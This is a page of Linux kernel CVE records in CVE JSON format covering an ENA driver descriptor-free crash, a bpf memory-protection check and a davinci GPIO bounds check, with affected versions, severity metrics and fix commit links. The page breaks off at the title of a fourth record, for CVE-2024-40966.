
Vendor

Product

Version

Linux

Affected: 548c4940b9f1f527f81509468dd60b61418880b6 , < b26aa765f7437e1bbe8db4c1641b12bd5dd378f0 (git)
Affected: 548c4940b9f1f527f81509468dd60b61418880b6 , < fdfbf54d128ab6ab255db138488f9650485795a2 (git)
Affected: 548c4940b9f1f527f81509468dd60b61418880b6 , < 19ff8fed3338898b70b2aad831386c78564912e1 (git)
Affected: 548c4940b9f1f527f81509468dd60b61418880b6 , < 5c7f2240d9835a7823d87f7460d8eae9f4e504c7 (git)
Affected: 548c4940b9f1f527f81509468dd60b61418880b6 , < c31baa07f01307b7ae05f3ce32b89d8e2ba0cc1d (git)
Affected: 548c4940b9f1f527f81509468dd60b61418880b6 , < bf02d9fe00632d22fa91d34749c7aacf397b6cde (git)

Linux

Affected: 5.6
Unaffected: 0 , < 5.6 (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.156 , ≤ 5.15.* (semver)
Unaffected: 6.1.87 , ≤ 6.1.* (semver)
Unaffected: 6.6.28 , ≤ 6.6.* (semver)
Unaffected: 6.8.7 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35958",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-29T18:17:10.294133Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-31T20:13:03.442Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.187Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b26aa765f7437e1bbe8db4c1641b12bd5dd378f0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fdfbf54d128ab6ab255db138488f9650485795a2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/19ff8fed3338898b70b2aad831386c78564912e1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5c7f2240d9835a7823d87f7460d8eae9f4e504c7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c31baa07f01307b7ae05f3ce32b89d8e2ba0cc1d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bf02d9fe00632d22fa91d34749c7aacf397b6cde"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/amazon/ena/ena_netdev.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b26aa765f7437e1bbe8db4c1641b12bd5dd378f0",
              "status": "affected",
              "version": "548c4940b9f1f527f81509468dd60b61418880b6",
              "versionType": "git"
            },
            {
              "lessThan": "fdfbf54d128ab6ab255db138488f9650485795a2",
              "status": "affected",
              "version": "548c4940b9f1f527f81509468dd60b61418880b6",
              "versionType": "git"
            },
            {
              "lessThan": "19ff8fed3338898b70b2aad831386c78564912e1",
              "status": "affected",
              "version": "548c4940b9f1f527f81509468dd60b61418880b6",
              "versionType": "git"
            },
            {
              "lessThan": "5c7f2240d9835a7823d87f7460d8eae9f4e504c7",
              "status": "affected",
              "version": "548c4940b9f1f527f81509468dd60b61418880b6",
              "versionType": "git"
            },
            {
              "lessThan": "c31baa07f01307b7ae05f3ce32b89d8e2ba0cc1d",
              "status": "affected",
              "version": "548c4940b9f1f527f81509468dd60b61418880b6",
              "versionType": "git"
            },
            {
              "lessThan": "bf02d9fe00632d22fa91d34749c7aacf397b6cde",
              "status": "affected",
              "version": "548c4940b9f1f527f81509468dd60b61418880b6",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/amazon/ena/ena_netdev.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.6"
            },
            {
              "lessThan": "5.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.156",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.87",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.28",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.156",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.87",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.28",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.7",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ena: Fix incorrect descriptor free behavior\n\nENA has two types of TX queues:\n- queues which only process TX packets arriving from the network stack\n- queues which only process TX packets forwarded to it by XDP_REDIRECT\n  or XDP_TX instructions\n\nThe ena_free_tx_bufs() cycles through all descriptors in a TX queue\nand unmaps + frees every descriptor that hasn\u0027t been acknowledged yet\nby the device (uncompleted TX transactions).\nThe function assumes that the processed TX queue is necessarily from\nthe first category listed above and ends up using napi_consume_skb()\nfor descriptors belonging to an XDP specific queue.\n\nThis patch solves a bug in which, in case of a VF reset, the\ndescriptors aren\u0027t freed correctly, leading to crashes."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:09:13.745Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b26aa765f7437e1bbe8db4c1641b12bd5dd378f0"
        },
        {
          "url": "https://git.kernel.org/stable/c/fdfbf54d128ab6ab255db138488f9650485795a2"
        },
        {
          "url": "https://git.kernel.org/stable/c/19ff8fed3338898b70b2aad831386c78564912e1"
        },
        {
          "url": "https://git.kernel.org/stable/c/5c7f2240d9835a7823d87f7460d8eae9f4e504c7"
        },
        {
          "url": "https://git.kernel.org/stable/c/c31baa07f01307b7ae05f3ce32b89d8e2ba0cc1d"
        },
        {
          "url": "https://git.kernel.org/stable/c/bf02d9fe00632d22fa91d34749c7aacf397b6cde"
        }
      ],
      "title": "net: ena: Fix incorrect descriptor free behavior",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35958",
    "datePublished": "2024-05-20T09:41:50.585Z",
    "dateReserved": "2024-05-17T13:50:33.136Z",
    "dateUpdated": "2025-05-04T09:09:13.745Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42068 (GCVE-0-2024-42068)

Vulnerability from cvelistv5 – Published: 2024-07-29 15:52 – Updated: 2026-01-05 10:51

Title

bpf: Take return from set_memory_ro() into account with bpf_prog_lock_ro()

Summary

In the Linux kernel, the following vulnerability has been resolved: bpf: Take return from set_memory_ro() into account with bpf_prog_lock_ro() set_memory_ro() can fail, leaving memory unprotected. Check its return and take it into account as an error.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/a359696856ca9409f…
	https://git.kernel.org/stable/c/e4f602e3ff749ba77…
	https://git.kernel.org/stable/c/05412471beba313ec…
	https://git.kernel.org/stable/c/7d2cc63eca0c993c9…

Impacted products

Vendor

Product

Version

Linux

Affected: 60a3b2253c413cf601783b070507d7dd6620c954 , < a359696856ca9409fb97655c5a8ef0f549cb6e03 (git)
Affected: 60a3b2253c413cf601783b070507d7dd6620c954 , < e4f602e3ff749ba770bf8ff10196e18358de6720 (git)
Affected: 60a3b2253c413cf601783b070507d7dd6620c954 , < 05412471beba313ecded95aa17b25fe84bb2551a (git)
Affected: 60a3b2253c413cf601783b070507d7dd6620c954 , < 7d2cc63eca0c993c99d18893214abf8f85d566d8 (git)

Linux

Affected: 3.18
Unaffected: 0 , < 3.18 (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:05.442Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a359696856ca9409fb97655c5a8ef0f549cb6e03"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e4f602e3ff749ba770bf8ff10196e18358de6720"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fdd411af8178edc6b7bf260f8fa4fba1bedd0a6d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e3540e5a7054d6daaf9a1415a48aacb092112a89"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/05412471beba313ecded95aa17b25fe84bb2551a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7d2cc63eca0c993c99d18893214abf8f85d566d8"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42068",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:19:52.600102Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:08.404Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "include/linux/filter.h",
            "kernel/bpf/core.c",
            "kernel/bpf/verifier.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "a359696856ca9409fb97655c5a8ef0f549cb6e03",
              "status": "affected",
              "version": "60a3b2253c413cf601783b070507d7dd6620c954",
              "versionType": "git"
            },
            {
              "lessThan": "e4f602e3ff749ba770bf8ff10196e18358de6720",
              "status": "affected",
              "version": "60a3b2253c413cf601783b070507d7dd6620c954",
              "versionType": "git"
            },
            {
              "lessThan": "05412471beba313ecded95aa17b25fe84bb2551a",
              "status": "affected",
              "version": "60a3b2253c413cf601783b070507d7dd6620c954",
              "versionType": "git"
            },
            {
              "lessThan": "7d2cc63eca0c993c99d18893214abf8f85d566d8",
              "status": "affected",
              "version": "60a3b2253c413cf601783b070507d7dd6620c954",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "include/linux/filter.h",
            "kernel/bpf/core.c",
            "kernel/bpf/verifier.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.18"
            },
            {
              "lessThan": "3.18",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Take return from set_memory_ro() into account with bpf_prog_lock_ro()\n\nset_memory_ro() can fail, leaving memory unprotected.\n\nCheck its return and take it into account as an error."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:51:36.665Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/a359696856ca9409fb97655c5a8ef0f549cb6e03"
        },
        {
          "url": "https://git.kernel.org/stable/c/e4f602e3ff749ba770bf8ff10196e18358de6720"
        },
        {
          "url": "https://git.kernel.org/stable/c/05412471beba313ecded95aa17b25fe84bb2551a"
        },
        {
          "url": "https://git.kernel.org/stable/c/7d2cc63eca0c993c99d18893214abf8f85d566d8"
        }
      ],
      "title": "bpf: Take return from set_memory_ro() into account with bpf_prog_lock_ro()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42068",
    "datePublished": "2024-07-29T15:52:32.538Z",
    "dateReserved": "2024-07-29T15:50:41.168Z",
    "dateUpdated": "2026-01-05T10:51:36.665Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42092 (GCVE-0-2024-42092)

Vulnerability from cvelistv5 – Published: 2024-07-29 17:35 – Updated: 2025-11-03 22:01

Title

gpio: davinci: Validate the obtained number of IRQs

Summary

In the Linux kernel, the following vulnerability has been resolved: gpio: davinci: Validate the obtained number of IRQs Value of pdata->gpio_unbanked is taken from Device Tree. In case of broken DT due to any error this value can be any. Without this value validation there can be out of chips->irqs array boundaries access in davinci_gpio_probe(). Validate the obtained nirq value so that it won't exceed the maximum number of IRQs per bank. Found by Linux Verification Center (linuxtesting.org) with SVACE.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/a8d78984fdc105bc1…
	https://git.kernel.org/stable/c/cd75721984337c38a…
	https://git.kernel.org/stable/c/e44a83bf15c4db053…
	https://git.kernel.org/stable/c/70b48899f3f23f98a…
	https://git.kernel.org/stable/c/89d7008af49458086…
	https://git.kernel.org/stable/c/2d83492259ad746b6…
	https://git.kernel.org/stable/c/c542e51306d5f1eba…
	https://git.kernel.org/stable/c/7aa9b96e9a73e4ec1…

Impacted products

Vendor

Product

Version

Linux

Affected: eb3744a2dd01cb07ce9f556d56d6fe451f0c313a , < a8d78984fdc105bc1a38b73e98d32b1bc4222684 (git)
Affected: eb3744a2dd01cb07ce9f556d56d6fe451f0c313a , < cd75721984337c38a12aeca33ba301d31ca4b3fd (git)
Affected: eb3744a2dd01cb07ce9f556d56d6fe451f0c313a , < e44a83bf15c4db053ac6dfe96a23af184c9136d9 (git)
Affected: eb3744a2dd01cb07ce9f556d56d6fe451f0c313a , < 70b48899f3f23f98a52c5b1060aefbdc7ba7957b (git)
Affected: eb3744a2dd01cb07ce9f556d56d6fe451f0c313a , < 89d7008af4945808677662a630643b5ea89c6e8d (git)
Affected: eb3744a2dd01cb07ce9f556d56d6fe451f0c313a , < 2d83492259ad746b655f196cd5d1be4b3d0a3782 (git)
Affected: eb3744a2dd01cb07ce9f556d56d6fe451f0c313a , < c542e51306d5f1eba3af84daa005826223382470 (git)
Affected: eb3744a2dd01cb07ce9f556d56d6fe451f0c313a , < 7aa9b96e9a73e4ec1771492d0527bd5fc5ef9164 (git)

Linux

Affected: 4.19
Unaffected: 0 , < 4.19 (semver)
Unaffected: 4.19.317 , ≤ 4.19.* (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:24.574Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a8d78984fdc105bc1a38b73e98d32b1bc4222684"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cd75721984337c38a12aeca33ba301d31ca4b3fd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e44a83bf15c4db053ac6dfe96a23af184c9136d9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/70b48899f3f23f98a52c5b1060aefbdc7ba7957b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/89d7008af4945808677662a630643b5ea89c6e8d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2d83492259ad746b655f196cd5d1be4b3d0a3782"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c542e51306d5f1eba3af84daa005826223382470"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7aa9b96e9a73e4ec1771492d0527bd5fc5ef9164"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42092",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:18:34.561678Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:00.849Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpio/gpio-davinci.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "a8d78984fdc105bc1a38b73e98d32b1bc4222684",
              "status": "affected",
              "version": "eb3744a2dd01cb07ce9f556d56d6fe451f0c313a",
              "versionType": "git"
            },
            {
              "lessThan": "cd75721984337c38a12aeca33ba301d31ca4b3fd",
              "status": "affected",
              "version": "eb3744a2dd01cb07ce9f556d56d6fe451f0c313a",
              "versionType": "git"
            },
            {
              "lessThan": "e44a83bf15c4db053ac6dfe96a23af184c9136d9",
              "status": "affected",
              "version": "eb3744a2dd01cb07ce9f556d56d6fe451f0c313a",
              "versionType": "git"
            },
            {
              "lessThan": "70b48899f3f23f98a52c5b1060aefbdc7ba7957b",
              "status": "affected",
              "version": "eb3744a2dd01cb07ce9f556d56d6fe451f0c313a",
              "versionType": "git"
            },
            {
              "lessThan": "89d7008af4945808677662a630643b5ea89c6e8d",
              "status": "affected",
              "version": "eb3744a2dd01cb07ce9f556d56d6fe451f0c313a",
              "versionType": "git"
            },
            {
              "lessThan": "2d83492259ad746b655f196cd5d1be4b3d0a3782",
              "status": "affected",
              "version": "eb3744a2dd01cb07ce9f556d56d6fe451f0c313a",
              "versionType": "git"
            },
            {
              "lessThan": "c542e51306d5f1eba3af84daa005826223382470",
              "status": "affected",
              "version": "eb3744a2dd01cb07ce9f556d56d6fe451f0c313a",
              "versionType": "git"
            },
            {
              "lessThan": "7aa9b96e9a73e4ec1771492d0527bd5fc5ef9164",
              "status": "affected",
              "version": "eb3744a2dd01cb07ce9f556d56d6fe451f0c313a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpio/gpio-davinci.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.19"
            },
            {
              "lessThan": "4.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.317",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.317",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngpio: davinci: Validate the obtained number of IRQs\n\nValue of pdata-\u003egpio_unbanked is taken from Device Tree. In case of broken\nDT due to any error this value can be any. Without this value validation\nthere can be out of chips-\u003eirqs array boundaries access in\ndavinci_gpio_probe().\n\nValidate the obtained nirq value so that it won\u0027t exceed the maximum\nnumber of IRQs per bank.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:22:49.782Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/a8d78984fdc105bc1a38b73e98d32b1bc4222684"
        },
        {
          "url": "https://git.kernel.org/stable/c/cd75721984337c38a12aeca33ba301d31ca4b3fd"
        },
        {
          "url": "https://git.kernel.org/stable/c/e44a83bf15c4db053ac6dfe96a23af184c9136d9"
        },
        {
          "url": "https://git.kernel.org/stable/c/70b48899f3f23f98a52c5b1060aefbdc7ba7957b"
        },
        {
          "url": "https://git.kernel.org/stable/c/89d7008af4945808677662a630643b5ea89c6e8d"
        },
        {
          "url": "https://git.kernel.org/stable/c/2d83492259ad746b655f196cd5d1be4b3d0a3782"
        },
        {
          "url": "https://git.kernel.org/stable/c/c542e51306d5f1eba3af84daa005826223382470"
        },
        {
          "url": "https://git.kernel.org/stable/c/7aa9b96e9a73e4ec1771492d0527bd5fc5ef9164"
        }
      ],
      "title": "gpio: davinci: Validate the obtained number of IRQs",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42092",
    "datePublished": "2024-07-29T17:35:01.209Z",
    "dateReserved": "2024-07-29T15:50:41.172Z",
    "dateUpdated": "2025-11-03T22:01:24.574Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-40966 (GCVE-0-2024-40966)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:32 – Updated: 2026-01-05 10:36

Title

tty: add the option to have a tty reject a new ldisc

Summary

